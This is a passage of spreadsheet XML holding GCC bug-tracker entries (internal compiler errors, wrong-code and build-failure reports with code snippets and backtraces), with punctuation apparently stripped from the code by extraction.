gcc version 3.3 20021104 (experimental)
Environment:
cygwin Win2K
How-To-Repeat:
gcc foo.c</t>
  </si>
  <si>
    <t>jdonner0</t>
  </si>
  <si>
    <t>GCC-30221</t>
  </si>
  <si>
    <t>[4.1/4.2/4.3 Regression] internal compiler error: in reshape_init_r at cp/decl.c:4632</t>
  </si>
  <si>
    <t>Initializing a struct member that is a union of function pointers with a NULL (0) value causes an internal compiler error: in reshape_init_r at cp/decl.c:4632.
This code compiles and executes correctly with g++ 3.2 33 and 3.4.
See attached program code that demonstrates the compile error. No options were used just 'g++ t.cpp'.</t>
  </si>
  <si>
    <t>mjones</t>
  </si>
  <si>
    <t>GCC-44666</t>
  </si>
  <si>
    <t>[F2008] Passing NULL pointer or unallocated allocatable to OPTIONAL dummy</t>
  </si>
  <si>
    <t>12.5.2.12 Argument presence and restrictions on arguments not present
A dummy argument or an entity that is host associated with a dummy argument is not present if the dummy argument
[...]
* does not have the ALLOCATABLE or POINTER attribute and corresponds to an
  actual argument that
  - has the ALLOCATABLE attribute and is not allocated or
  - has the POINTER attribute and is disassociated.
That probably means:
a) NULL(mold) as actual argument is allowed
b) For scalars it should just work
c) For arguments with descriptors one needs to add:
   (actual.data == NULL) ? NULL : actual</t>
  </si>
  <si>
    <t>GCC-9325</t>
  </si>
  <si>
    <t>wrong conversion of constants: (int)(float)(int) (INT_MAX)</t>
  </si>
  <si>
    <t>(int)(float)(int)(INT_MAX)
is transformed to INT_MAX which is incorrect.
Should leave the conversions.
f1() and f2() are optimized wrong 
while f3() and f4() are ok
/////  file 2_31.c 
extern int printf(const char * ...)
int f1(){
        return (int)2147483648.0f
}
int f2(){
        return (int)(float)( 2147483647 )
}
int f3(){
        float a = 2147483648.0f
        return (int)a
}
int f4(){
        int a = 2147483647
        float b = (float)a
        return (int)b
}
int main()
{
        printf(%d\n%d\n%d\n%d\n f1() f2() f3() f4())
        return 0
}
Release:
3.2
Environment:
Sparc Solaris 2.8
How-To-Repeat:
gcc 2_31.c  a.out</t>
  </si>
  <si>
    <t>GCC-46663</t>
  </si>
  <si>
    <t>ICE: SIGSEGV in vect_recog_pow_pattern (gimple.h:2055) with -O -fexceptions -ftree-vectorize</t>
  </si>
  <si>
    <t>Created attachment 22533
reduced testcase
Compiler output:
$ gcc -O -fexceptions -ftree-vectorize pr46663.c
==14635== Invalid read of size 2
==14635==    at 0x1032863: vect_recog_pow_pattern (gimple.h:2055)
==14635==    by 0x1033D35: vect_pattern_recog (tree-vect-patterns.c:683)
==14635==    by 0xA1D8B7: vect_analyze_loop (tree-vect-loop.c:1406)
==14635==    by 0xA2AE58: vectorize_loops (tree-vectorizer.c:199)
==14635==    by 0x7EB7FE: execute_one_pass (passes.c:1564)
==14635==    by 0x7EBAC4: execute_pass_list (passes.c:1619)
==14635==    by 0x7EBAD6: execute_pass_list (passes.c:1620)
==14635==    by 0x7EBAD6: execute_pass_list (passes.c:1620)
==14635==    by 0x92BDB5: tree_rest_of_compilation (tree-optimize.c:422)
==14635==    by 0xAEFF11: cgraph_expand_function (cgraphunit.c:1494)
==14635==    by 0xAF24E9: cgraph_optimize (cgraphunit.c:1553)
==14635==    by 0xAF2A59: cgraph_finalize_compilation_unit (cgraphunit.c:1017)
==14635==  Address 0x0 is not stack'd malloc'd or (recently) free'd
==14635== 
pr46663.c: In function 'foo':
pr46663.c:3:5: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r167127 - crash
4.5.1 4.4.5 4.3.5 4.2.4 4.1.2 4.0.4 - crash
3.4.6 3.3.6 - don't know -ftree-vectorize</t>
  </si>
  <si>
    <t>GCC-36788</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE in loop_optimizer_init at -O3</t>
  </si>
  <si>
    <t>The attached code triggers an ICE when compiled with -O3:
internal compiler error: in loop_optimizer_init at loop-init.c:46
-O2 works. This was first encountered in revision 137631. The test case is already reduced from a much larger program but still has 1000+ lines. I was not able to reduce it further.</t>
  </si>
  <si>
    <t>GCC-1529</t>
  </si>
  <si>
    <t>internal compiler error after reporting parse error</t>
  </si>
  <si>
    <t>This is the error message
extern.cc: In method `term opCNOT::funct (const bitvec &amp;) const':
extern.cc:254: parse error before `not'
extern.cc:256: Internal error #122.
extern.cc:256: Internal compiler error in finish_function at 
../gcc/cp/decl.c:14422
Release:
gcc version gcc version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
Linux 2.2.18 i686  AMD Athlon red hat 7.0
How-To-Repeat:
g++ -c -Wall -g -DQCL_DEBUG -DQC_DEBUG -DQCL_USE_READLINE -Iqc -DDEF_INCLUDE_PATH=\/usr/local/lib/qcl\ extern.cc 
untar included files run command line above.</t>
  </si>
  <si>
    <t>ajb44.geo</t>
  </si>
  <si>
    <t>GCC-21884</t>
  </si>
  <si>
    <t>[4.1 regression] ICE with -ftree-vectorize</t>
  </si>
  <si>
    <t>This is with today's sources so unrelated to the previously fixed  
PR 21789 even though the error message is the same. 
With attached code I get this: 
spec/src&gt; c++ -O2 -march=pentium4m -msse2 -ftree-vectorize 
auto_derivative_function.ii 
auto_derivative_function.ii:6859: warning: __malloc__ attribute ignored 
auto_derivative_function.ii: In member function void 
AutoDerivativeFunction::gradient_list(const std::vector 
std::allocator &gt; &gt;&amp; std::vector 
std::allocator &gt; &gt;: 
auto_derivative_function.ii:32743: internal compiler error: tree check: 
expected ssa_name have var_decl in verify_ssa at tree-ssa.c:750 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
W.</t>
  </si>
  <si>
    <t>GCC-27707</t>
  </si>
  <si>
    <t>g++.dg/tree-ssa/ivopts-1.C fails</t>
  </si>
  <si>
    <t>FAIL: g++.dg/tree-ssa/ivopts-1.C scan-tree-dump-not &amp;x\[5\]
FAIL: g++.dg/tree-ssa/ivopts-1.C scan-tree-dump-not offset: -4B
appeared on mainline on hppa2.0w-hp-hpux11.11 and hppa64-hp-hpux11.11 when the test was added.</t>
  </si>
  <si>
    <t>GCC-53157</t>
  </si>
  <si>
    <t>within lambda error: lvalue required as unary â€˜&amp;â€™ operand</t>
  </si>
  <si>
    <t>the following code failed to compile with g++-4.7.0
------------------- BEGIN -------------------
void f(const int*) { }
void g() {
 const int N = 10
 [=] {
  int arr[N] // OK: not an odr-use refers to automatic variable
  f(      // OK: causes N to be captured &amp;N points to the
              // corresponding member of the closure type
 }
}
int main ()
{
 return 0
}
------------------- BEGIN -------------------
the f and g are copied from c++11 5.1.2/17.
compiled with :
~/gcc/4.7.0/bin/c++ --std=c++11 -Wall t1.cc
g++-4.7.0 gives me two errors :
(1) for the call to f( : error: lvalue required as unary â€˜&amp;â€™ operand
(2) at the end of the lambda : error: expected â€˜â€™ before â€˜}â€™ token
the standard says that the use of f(&amp;N) is valid because the N is odr-used and should be implicitly captured by value so &amp;N returns a pointer to the data member of the closure type that is a copy of the original N.
my g++ -v is :
Reading specs from /home/meng/gcc/4.7.0/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/specs
COLLECT_GCC=/home/meng/gcc/4.7.0/bin/c++
COLLECT_LTO_WRAPPER=/home/meng/gcc/4.7.0/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --prefix=/home/meng/gcc/4.7.0 --enable-languages=cc++ -disable-multilib
Thread model: posix
gcc version 4.7.0 (GCC) 
my uname -a is :
Linux meng-laptop 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:12:07 UTC 2012 x86_64 GNU/Linux</t>
  </si>
  <si>
    <t>meng</t>
  </si>
  <si>
    <t>GCC-30626</t>
  </si>
  <si>
    <t>[4.1 only] Wrong-code for internal read</t>
  </si>
  <si>
    <t>Ante-scriptum: This PR might be related to PR30284 (or not).
$ cat a.f90                
  character(len=12) :: date(1) = (/ '200612231200' /)
  integer :: foo
  read (date(:)(1:4)'(i4)') foo
  print * foo
  end
$ ifort a.f90 &amp;&amp; ./a.out
        2006
$ gfortran a.f90 &amp;&amp; ./a.out
           2
gfortran has an incorrect behaviour here while ifort is doing the right thing (like all other compilers I could test).</t>
  </si>
  <si>
    <t>GCC-42944</t>
  </si>
  <si>
    <t>[4.5 Regression] errno misoptimization around malloc call</t>
  </si>
  <si>
    <t>tst-malloc from glibc testsuite fails with 4.5.0 20100129 reporting Error: errno is not set correctly.  Examination of object files shows that gcc is assuming that save in the following is always zero.
  errno = 0
  p = malloc (-1)
  save = errno
errno is defined as (*__errno_location)() with
extern int *__errno_location (void) __attribute__ ((__nothrow__)) __attribute__ ((__const__))
everything looks ok up until tst-malloc.c.065t.fre</t>
  </si>
  <si>
    <t>GCC-51216</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE with statement expression</t>
  </si>
  <si>
    <t>The following code snippet triggers an ICE since GCC 4.6.0 when compiled with -std=c++0x:
==========================
void foo()
{
  int i = ({ if (1)  })
}
==========================
bug.cc: In function 'void foo()':
bug.cc:3:24: sorry unimplemented: unexpected AST of kind if_stmt
bug.cc:3:24: internal compiler error: in potential_constant_expression_1 at cp/semantics.c:8426
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-66259</t>
  </si>
  <si>
    <t>Combined gcc and binutils build from git-master fails with gas/as-new not existing</t>
  </si>
  <si>
    <t>Posted this first at binutils.  Alan Modra said Not a binutils bug. and closed it at https://sourceware.org/bugzilla/show_bug.cgi?id=18450
On a fresh Fedora 21 install:
sudo yum install git gcc gcc-c++ texinfo-tex flex bison mpfr-devel gmp-devel libmpc-devel isl isl-devel
mkdir gcc.binutils.combined
cd gcc.binutils.combined
git clone git://gcc.gnu.org/git/gcc.git gcc.git
git clone git://sourceware.org/git/binutils-gdb.git binutils-gdb.git
mkdir combined
cd combined
ln -s ../gcc.git/* .
ln --force -s ../binutils-gdb.git/* .
mkdir ../../gcc.binutils.combined.build.gcc
cd ../../gcc.binutils.combined.build.gcc
../gcc.binutils.combined/combined/configure --disable-multilib &amp;&amp; make &amp;&amp; sudo make install
Wind up getting:
../gcc.binutils.combined.build.gcc/./prev-gcc/as: line 106: ../gcc.binutils.combined.build.gcc/./gas/as-new: No such file or directory
Line 106 is:
exec $original ${1+$@} # with $original coming from case $original in
With:
[gcc.binutils.combined.build.gcc]$ find . | grep as-new
./prev-gas/as-new
Should gcc.binutils.combined.build.gcc/./prev-gcc/as:106 be calling ./prev-gas/as-new rather than ./gas/as-new ?</t>
  </si>
  <si>
    <t>darlingm</t>
  </si>
  <si>
    <t>GCC-3159</t>
  </si>
  <si>
    <t>IA64 gcc-ss-20010611 ICE on ia64-linux</t>
  </si>
  <si>
    <t>The input is coming from vim 5.7.
Release:
3.0 20010611 (prerelease)
Environment:
System: Linux D106 2.4.4-SMP #1 SMP Mon May 14 17:07:47 GMT 2001 ia64 unknown
Architecture: ia64
host: ia64-suse-linux-gnu
build: ia64-suse-linux-gnu
target: ia64-suse-linux-gnu
configured with: ../configure --enable-threads=posix --enable-long-long --prefix=/usr --with-local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man --enable-languages=cc++f77objcjava --with-gxx-include-dir=/usr/include/g++ --enable-nls --with-slibdir=/lib --enable-shared ia64-suse-linux
How-To-Repeat:
The compiler crashes with -O2 but not with -O1.</t>
  </si>
  <si>
    <t>GCC-55842</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] C++11 ICE with boost multi-precision and boost variant</t>
  </si>
  <si>
    <t>Compiling the attached sample file leads to an internal compiler error.
The problem only occurs with GCC-4.7 from Debian Unstable 4.7.2-1 and the upcoming 4.8 from Debian Experimental 4.8-20121218-1. Tested on an amd64 system.
I'm using a checkout of the latest boost release tree.
The command to reproduce the issue is:
gcc-4.8 -std=c++11 -c -I/src/boost/release test.cpp
This results in the following output:
In file included from /src/boost/release/boost/config.hpp:57:0
                 from /src/boost/release/boost/variant/detail/config.hpp:16
                 from /src/boost/release/boost/variant/variant.hpp:23
                 from /src/boost/release/boost/variant.hpp:17
                 from test.cpp:2:
/src/boost/release/boost/type_traits/has_nothrow_constructor.hpp: In instantiation of 'const bool boost::detail::has_nothrow_constructor_imp &gt; &gt;::value':
/src/boost/release/boost/type_traits/has_nothrow_constructor.hpp:32:1:   required from 'struct boost::has_nothrow_constructor &gt; &gt;'
/src/boost/release/boost/mpl/aux_/nested_type_wknd.hpp:26:31:   required from 'struct boost::mpl::aux::nested_type_wknd &gt; &gt; &gt;'
/src/boost/release/boost/mpl/not.hpp:39:8:   required from 'struct boost::mpl::not_ &gt; &gt; &gt;'
/src/boost/release/boost/mpl/aux_/nested_type_wknd.hpp:26:31:   required from 'struct boost::mpl::aux::nested_type_wknd boost::mpl::l_iter boost::multiprecision::number &gt; boost::mpl::l_end&gt; &gt; &gt; &gt;'
/src/boost/release/boost/mpl/aux_/preprocessed/gcc/and.hpp:23:8:   required from 'struct boost::mpl::aux::and_impl boost::mpl::l_iter boost::multiprecision::number &gt; boost::mpl::l_end&gt; &gt; &gt; mpl_::bool_ mpl_::bool_ mpl_::bool_ &gt;'
/src/boost/release/boost/mpl/aux_/preprocessed/gcc/and.hpp:48:8:   [ skipping 5 instantiation contexts use -ftemplate-backtrace-limit=0 to disable ]
/src/boost/release/boost/mpl/aux_/preprocessed/gcc/iter_fold_if_impl.hpp:101:135:   required from 'struct boost::mpl::aux::iter_fold_if_impl boost::multiprecision::number &gt; boost::mpl::l_end&gt; &gt; mpl_::int_ boost::mpl::protect &gt; boost::mpl::protect boost::mpl::l_iter &gt; 0&gt; mpl_::na boost::mpl::always &gt; &gt;'
/src/boost/release/boost/mpl/iter_fold_if.hpp:81:12:   required from 'struct boost::mpl::iter_fold_if boost::multiprecision::number &gt; boost::mpl::l_end&gt; mpl_::int_ boost::mpl::protect &gt; boost::mpl::protect mpl_::na mpl_::na&gt;::result_'
/src/boost/release/boost/mpl/iter_fold_if.hpp:104:11:   required from 'struct boost::mpl::iter_fold_if boost::multiprecision::number &gt; boost::mpl::l_end&gt; mpl_::int_ boost::mpl::protect &gt; boost::mpl::protect mpl_::na mpl_::na&gt;'
/src/boost/release/boost/variant/variant.hpp:189:17:   required from 'struct boost::detail::variant::find_fallback_type boost::multiprecision::number &gt; boost::mpl::l_end&gt; &gt;'
/src/boost/release/boost/variant/variant.hpp:1271:17:   required from 'class boost::variant &gt; &gt;'
test.cpp:10:27:   required from here
/src/boost/release/boost/type_traits/has_nothrow_constructor.hpp:24:32: internal compiler error: in nothrow_spec_p at cp/except.c:1265
    BOOST_STATIC_CONSTANT(bool value = BOOST_HAS_NOTHROW_CONSTRUCTOR(T))
                                ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/cc6oBMd0.out file please attach this to your bugreport.</t>
  </si>
  <si>
    <t>koraq</t>
  </si>
  <si>
    <t>GCC-66040</t>
  </si>
  <si>
    <t>ICE on misplaced sequence in function</t>
  </si>
  <si>
    <t>An ICE occurs with a misplaced sequence in a function.
$ cat disrupt_2_sequence.f90
   real function f(x)
      sequence
   end
$ gfortran -c disrupt_2_sequence.f90
    sequence
           1
internal compiler error: Unexpected SEQUENCE statement in verify_st_order() at (1)
Tested with gfortran 5.1.1 on SUSE Linux 13.2 (64 bit)
Kind regards.</t>
  </si>
  <si>
    <t>GCC-16591</t>
  </si>
  <si>
    <t>Missing '#ifndef DISABLE_MAIN_ARGS' in _Jv_RunMain (libjava/prims.cc)</t>
  </si>
  <si>
    <t>GCC 3.3.1-2 libjava/prims.cc @ line 963 calls _Jv_SetArgs even if DISABLE_MAIN_ARGS has been defined 
in the configuration.   This is problematic in my case because argv/argc are known to be invalid.
To fix this problem enclose the call to _Jv_SetArgs inside an #ifndef DISABLE_MAIN_ARGS block 
#ifndef DISABLE_MAIN_ARGS
         _Jv_SetArgs(argc argv)
#endif</t>
  </si>
  <si>
    <t>pblemel</t>
  </si>
  <si>
    <t>GCC-40082</t>
  </si>
  <si>
    <t>[4.5 Regression] Power bootstrap is broken in building libstdc++</t>
  </si>
  <si>
    <t>I synced up to the current tree and did a bootstrap build and it fails in building libstdc++:
/home/meissner/fsf-src/trunk/libstdc++-v3/src/compatibility-ldbl.cc:77: error: inlined_to pointer is wrong
void std::basic_string::_M_leak() [with _CharT = wchar_t _Traits = std::char_traits _Alloc = std::allocator]/608(-1) [0x4000183b500]: (inline copy in _OutIter std::money_put::_M_insert(iter_type std::ios_base&amp; char_type const std::money_put::string_type&amp;) const [with bool _Intl = true _CharT = wchar_t _OutIter = std::ostreambuf_iterator iter_type = std::ostreambuf_iterator char_type = wchar_t std::money_put::string_type = std::basic_string]/568) (clone of void std::basic_string::_M_leak() [with _CharT = wchar_t _Traits = std::char_traits _Alloc = std::allocator]/648) availability:available 16 insns body finalized inlinable
  called by: std::basic_string::reference std::basic_string::operator[](std::basic_string::size_type) [with _CharT = wchar_t _Traits = std::char_traits _Alloc = std::allocator std::basic_string::reference = wchar_t&amp; std::basic_string::size_type = long unsigned int]/246 (1.00 per call) (inlined) (can throw external) 
  calls: void std::basic_string::_M_leak_hard() [with _CharT = wchar_t _Traits = std::char_traits _Alloc = std::allocator]/858 (0.63 per call) (can throw external) 
/home/meissner/fsf-src/trunk/libstdc++-v3/src/compatibility-ldbl.cc:77: internal compiler error: verify_cgraph_node failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions</t>
  </si>
  <si>
    <t>GCC-2549</t>
  </si>
  <si>
    <t>Segmentation faults</t>
  </si>
  <si>
    <t>bossekr@mars:~/projects/maintainer/boost-1.21.1/libs/graph/src$ g++ -save-temps -v -ftemplate-depth-30 -O2 -DGRAPHVIZ_GRAPH=boost::GraphvizGraph -I../../.. -g  -fPIC -DPIC -c graphviz_parser.cpp -o dynamic/graphviz_graph_parser.o
Reading specs from /usr/lib/gcc-lib/i386-linux/2.95.4/specs
gcc version 2.95.4 20010319 (Debian prerelease)
 /usr/lib/gcc-lib/i386-linux/2.95.4/cpp0 -lang-c++ -v -I../../.. -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -D__OPTIMIZE__ -g -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -D__PIC__ -D__pic__ -DGRAPHVIZ_GRAPH=boost::GraphvizGraph -DPIC graphviz_parser.cpp graphviz_parser.ii
GNU CPP version 2.95.4 20010319 (Debian prerelease) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 ../../..
 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../include/g++-3
 /usr/local/include
 /usr/lib/gcc-lib/i386-linux/2.95.4/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../i386-linux/include
End of omitted list.
 /usr/lib/gcc-lib/i386-linux/2.95.4/cc1plus graphviz_parser.ii -quiet -dumpbase graphviz_parser.cc -g -O2 -version -ftemplate-depth-30 -fPIC -o graphviz_parser.s
GNU C++ version 2.95.4 20010319 (Debian prerelease) (i386-linux) compiled by GNU C version 2.95.4 20010319 (Debian prerelease).
 as -V -Qy -o dynamic/graphviz_graph_parser.o graphviz_parser.s
GNU assembler version 2.11.90.0.1 (i386-linux) using BFD version 2.11.90.0.1
g++: Internal compiler error: program as got fatal signal 11
bossekr@mars:~/projects/maintainer/boost-1.21.1/libs/graph/src$
Release:
GNU CPP version 2.95.4 20010319 (Debian prerelease) (i386 Linux/ELF)
Environment:
Debian GNU/Linux v2.3 (sid/unstable)
How-To-Repeat:
You have to repeat the same action more then twice until the SIGSEGV happen... This is really instable!</t>
  </si>
  <si>
    <t>rbossek</t>
  </si>
  <si>
    <t>GCC-35189</t>
  </si>
  <si>
    <t>-mno-sse4.2 turns off SSE4a</t>
  </si>
  <si>
    <t>[hjl@gnu-6 tmp]$ cat y.c
#include 
int
main ()
{
#ifdef __SSE__
  printf (SSE\n)
#endif
#ifdef __SSE2__
  printf (SSE2\n)
#endif
#ifdef __SSE3__
  printf (SSE3\n)
#endif
#ifdef __SSSE3__
  printf (SSSE3\n)
#endif
#ifdef __SSE4_1__
  printf (SSE4.1\n)
#endif
#ifdef __SSE4_2__
  printf (SSE4.2\n)
#endif
#ifdef __SSE4A__
  printf (SSE4A\n)
#endif
}
[hjl@gnu-6 tmp]$ /usr/gcc-4.3/bin/gcc -march=core2 -mno-sse4.2 y.c &amp;&amp; ./a.out SSE
SSE2
SSE3
SSSE3
[hjl@gnu-6 tmp]$ /usr/gcc-4.3/bin/gcc -march=amdfam10 -mno-sse4.2 y.c &amp;&amp; ./a.out 
SSE
SSE2
SSE3
[hjl@gnu-6 tmp]$ /usr/gcc-4.3/bin/gcc -march=amdfam10 y.c &amp;&amp; ./a.out
SSE
SSE2
SSE3
SSE4A
[hjl@gnu-6 tmp]$</t>
  </si>
  <si>
    <t>GCC-36801</t>
  </si>
  <si>
    <t>config/cpu/generic/atomicity_mutex/atomicity.h incorrectly relies on global constructor ordering</t>
  </si>
  <si>
    <t>In 4.3.1 (and 4.2.x and the trunk) ARM targets and no doubt plenty others use libstdc++/config/cpu/generic/atomicity_mutex/atomicity.h.
With some build magic in libstdc++/src/Makefile.am this file is also atomicity.cc when building the library. Thus this object gets instantiated:
{
  __gnu_cxx::__mutex atomic_mutex
} // anonymous namespace
The constructor for __mutex in include/ext/concurrence.h has a private member of the underlying __gthread_mutex_t and its constructor uses GTHREAD_MUTEX_INIT or calls GTHREAD_MUTEX_INIT_FUNCTION as appropriate as of course it should.
The problem is that this becomes a global constructor and there is no control over where in the running of global constructors it gets run. A consequence of this is that any other initialisation function from another constructor using atomic operations can end up locking a mutex which has never been initialised with unsurprising results. An example of such a case is ios_base::Init::Init() which calls __gnu_cxx::__exchange_and_add_dispatch() which eventually reaches __gnu_cxx::__scoped_lock sentry(atomic_mutex) which attempts to lock atomic_mutex.
Code prior to this implementation used __gthread_mutex_t in atomicity.h directly  using a macro defined by concurrence.h:
  __glibcxx_mutex_define_initialized(atomic_mutex)
and as such this used to work so this is a regression.
It seems this is an unintended consequence of this change: http://gcc.gnu.org/ml/libstdc++/2006-09/msg00084.html
I think this needs returning to something similar to the way it was before so that the __gthread_mutex_t was created in the atomic_mutex's own constructor.</t>
  </si>
  <si>
    <t>GCC-79544</t>
  </si>
  <si>
    <t>vec_sra (unsigned long longfoo) generating vsrd instead of vsrad</t>
  </si>
  <si>
    <t>Created attachment 40756
sample test
Noticed that vec_sra is generating a vsrd instruction rather than the expected vsrad instruction when using unsigned long long parameter.   
&gt;       #include 
&gt;       vector unsigned long long
&gt;       test6_sra (vector unsigned long long x vector unsigned long long y)
&gt;       {
&gt;         return vec_sra (x y)
&gt;       }
&gt; #&gt; gcc -c testme_sra.c  -S -mvsx -O3 
&gt; #&gt; grep -A 3 test6_sra: testme_sra.s
&gt; test6_sra:
&gt;       vsrd 223
&gt;       blr
&gt;       .long 0
vec_sra() against charshortint appear OK. 
Seeing this on trunk (20170208) as well as older distro supplied compilers. 
test attached.</t>
  </si>
  <si>
    <t>willschm</t>
  </si>
  <si>
    <t>GCC-61353</t>
  </si>
  <si>
    <t>internal compiler error -recog.c:2208: extract_constrain_insn_cached</t>
  </si>
  <si>
    <t>Created attachment 32873
srtof_l.c save-temp *.i
Cross Compiling from x86_64 to ARM (using LFS as a guide)
$ uname -a
 Linux debian72X8664VB 3.2.0-4-amd64 #1 SMP Debian 3.2.57-3 x86_64 GNU/Linux
GLIBC commit: 26b0d2e1a1606da10c4dc4e109d7b9f2d92aab6a
GCC commit: 8753931abe4a279eb4b2c945fb8b5c14fc6774c9
GCC Static
 config.log
  $ ../gcc/configure --prefix=/cross-tools --build=x86_64-cross-linux-gnu --host=x86_64-cross-linux-gnu --target=armv7l-unknown-linux-gnueabihf --with-sysroot=/home/vboxadmin/Desktop/CLFS --with-local-prefix=/armv7l-unknown-linux-gnueabihf --with-native-system-header-dir=/armv7l-unknown-linux-gnueabihf/include --disable-nls --disable-shared --with-mpfr=/cross-tools --with-gmp=/cross-tools --with-isl=/cross-tools --with-cloog=/cross-tools --with-mpc=/cross-tools --without-headers --with-newlib --disable-decimal-float --disable-libgomp --disable-libmudflap --disable-libssp --disable-libatomic --disable-libitm --disable-libsanitizer --disable-libquadmath --disable-threads --disable-multilib --disable-target-zlib --with-system-zlib --enable-languages=c --enable-checking=release --enable-cloog-backend=isl --disable-isl-version-check --with-arch=armv7-a --with-float=hard --with-fpu=neon
GLIBC
 config.log
  $ ../glibc/configure --prefix=/armv7l-unknown-linux-gnueabihf --build=x86_64-cross-linux-gnu --host=armv7l-unknown-linux-gnueabihf --disable-profile --enable-kernel=3.8.13 --with-binutils=/cross-tools/bin --with-headers=/armv7l-unknown-linux-gnueabihf/include --enable-obsolete-rpc libc_cv_forced_unwind=yes libc_cv_c_cleanup=yes libc_cv_ctors_header=yes BUILD_CC=gcc CC=armv7l-unknown-linux-gnueabihf-gcc AR=armv7l-unknown-linux-gnueabihf-ar RANLIB=armv7l-unknown-linux-gnueabihf-ranlib CFLAGS=-O2 -pipe -mfpu=neon -mtune=cortex-a9 -march=armv7-a -mfloat-abi=hard CXXFLAGS=-O2 -pipe -mfpu=neon -mtune=cortex-a9 -march=armv7-a -mfloat-abi=hard LDFLAGS=-L/armv7l-unknown-linux-gnueabihf/lib -Wl-rpath -Wl/armv7l-unknown-linux-gnueabihf/lib
Error
 In file included from strtof_l.c:45:0:
strtod_l.c: In function '____strtof_l_internal':
strtod_l.c:1770:1: error: insn does not satisfy its constraints:
 }
 ^
(insn 1581 1580 1582 267 (set (reg:SI 463 [ D.16783 ])
        (ior:SI (ashift:SI (reg/v:SI 139 [ val ])
                (reg:SI 1254 [ D.16772 ]))
            (reg:SI 463 [ D.16783 ]))) strtod_l.c:1143 284 {*arith_shiftsi}
     (expr_list:REG_DEAD (reg:SI 1254 [ D.16772 ])
        (expr_list:REG_DEAD (reg/v:SI 139 [ val ])
            (nil))))
strtod_l.c:1770:1: internal compiler error: in extract_constrain_insn_cached at recog.c:2208
0x851045 _fatal_insn(char const* rtx_def const* char const* int char const*)
	../../gcc/gcc/rtl-error.c:109
0x85106f _fatal_insn_not_found(rtx_def const* char const* int char const*)
	../../gcc/gcc/rtl-error.c:120
0x826d8d extract_constrain_insn_cached(rtx_def*)
	../../gcc/gcc/recog.c:2208
0xb7b8a7 insn_default_latency(rtx_def*)
	../../gcc/gcc/config/arm/arm-tune.md:49
0xcb2306 insn_cost(rtx_def*)
	../../gcc/gcc/haifa-sched.c:1399
0xcb5bcc dep_cost_1(_dep* unsigned int)
	../../gcc/gcc/haifa-sched.c:1452
0xcb8268 priority
	../../gcc/gcc/haifa-sched.c:1647
0xcb8268 priority
	../../gcc/gcc/haifa-sched.c:1585
0xcb8318 set_priorities(rtx_def* rtx_def*)
	../../gcc/gcc/haifa-sched.c:6583
0x85e319 compute_priorities()
	../../gcc/gcc/sched-rgn.c:2925
0x860abd schedule_region
	../../gcc/gcc/sched-rgn.c:3018
0x860abd schedule_insns
	../../gcc/gcc/sched-rgn.c:3416
0x860abd schedule_insns()
	../../gcc/gcc/sched-rgn.c:3395
0x861032 rest_of_handle_sched
	../../gcc/gcc/sched-rgn.c:3620
0x861032 execute
	../../gcc/gcc/sched-rgn.c:3719
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make[2]: *** [/home/vboxadmin/Desktop/glibcBuild/stdlib/strtof_l.o] Error 1
make[2]: Leaving directory `/home/vboxadmin/Desktop/glibc/stdlib'
make[1]: *** [stdlib/subdir_lib] Error 2
make[1]: Leaving directory `/home/vboxadmin/Desktop/glibc'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>naroyce</t>
  </si>
  <si>
    <t>GCC-18740</t>
  </si>
  <si>
    <t>Execution-time sizeof drops side effects</t>
  </si>
  <si>
    <t>The program below which is a slight variation of a program from C99
section 6.5.3.4 contains an execution-time sizeof operator and its
argument should thus be evaluated.  Nevertheless i in not incremented.
I would expect i=1 to be printed.  I get i=0.
(Sun's C compiler seems to do the same thing.)
#include 
size_t fsize3 (int n)
{
  int i = 0
  char b[1][n+3]       // Variable length array.
  size_t s = sizeof (b[i++])    // Execution time sizeof.
  printf (i=%d\n i)
  return s
}
int main()
{
  size_t size
  size = fsize3(10)
  return 0
}</t>
  </si>
  <si>
    <t>GCC-64013</t>
  </si>
  <si>
    <t>[5 Regression] libsanitizer fails to build</t>
  </si>
  <si>
    <t>[35101s] I: Program returns random data in a function
[35101s] E: gcc5 no-return-in-nonvoid-function
../../../../libsanitizer/sanitizer_common/sanitizer_linux.cc:295
bool FileExists(const char *filename) {
#if SANITIZER_USES_CANONICAL_LINUX_SYSCALLS
  struct stat st
  if (internal_syscall(SYSCALL(newfstatat) AT_FDCWD filename &amp;st 0))
    return false
#else
  struct stat st
  if (internal_stat(filename &amp;st))
    return false
  // Sanity check: filename is a regular file.
  return S_ISREG(st.st_mode)
#endif
}
the SANITIZER_USES_CANONICAL_LINUX_SYSCALLS misses a return.</t>
  </si>
  <si>
    <t>GCC-84065</t>
  </si>
  <si>
    <t>[8 regression] string_1.f90 fails since r256944</t>
  </si>
  <si>
    <t>Hi
I've noticed failures on arm*linux* cross-compilers in:
    gfortran.dg/string_1.f90   -O   (test for errors line 10)
    gfortran.dg/string_1.f90   -O   (test for errors line 7)
    gfortran.dg/string_1.f90   -O   (test for errors line 8)
    gfortran.dg/string_1.f90   -O   (test for errors line 9)
    gfortran.dg/string_1.f90   -O  (test for excess errors)
It appeared between r256941 and r256970 and I bisected this to r256944.
The logs say:
